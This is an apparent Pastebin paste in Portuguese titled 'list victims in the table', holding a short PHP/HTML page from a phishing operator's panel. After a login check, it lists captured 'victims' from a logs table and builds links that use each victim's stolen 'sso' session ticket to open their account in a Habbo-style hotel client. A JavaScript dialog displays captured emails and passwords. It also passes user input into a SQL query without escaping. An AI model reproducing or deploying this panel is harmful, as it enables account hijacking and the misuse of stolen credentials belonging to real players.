nPhoenix

[Wix]Listar vítimas na table | vlw fura ^^

Feb 12th, 2012
318
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.92 KB | None | 0 0
  1. <table width="250" height="41" border="1">
  2.   <tr>
  3.     <center><td width="198">Nick da Vitima</td>
  4.  
  5.   </tr>
  6. <?
  7. @include 'Cconnect.php';
  8. $user = $class->antisql($_GET['u']);
  9. $senha = $class->antisql($_GET['s']);
  10. $query = mysql_query("SELECT * FROM $tabela WHERE nome='".$user."' AND senha='".$senha."'");
  11.     $mq = mysql_fetch_array($query);
  12.     if (empty($mq)){
  13.     die('Oi seu ip é '.$_SERVER['REMOTE_ADDR']);
  14.     };
  15.     ?>
  16.     <script>function infodialog(login,senha,email){
  17.     $('<b>Email</b>: '+login+'<br><b>Senha</b>: '+senha+'<br><b>Email adicionado</b>: '+email).dialog({modal:true});
  18.     };
  19.     </script>
  20.     <td>
  21.  
  22. <? $qqq = @mysql_query("select * from logs where owner='".$user."'");
  23.               while ($logs = @mysql_fetch_array($qqq)) {
  24.     echo "<a href=\"http://seu site do client /client.php?email=".$logs['sso']."&hotel=.com.br\" target=\"_blank\"><i><b style='color:green'>".$logs['nick']."</b></i></a><br>";
  25.     };
  26.     ?>
  27. </td></table>
Advertisement
Add Comment
Please, Sign In to add comment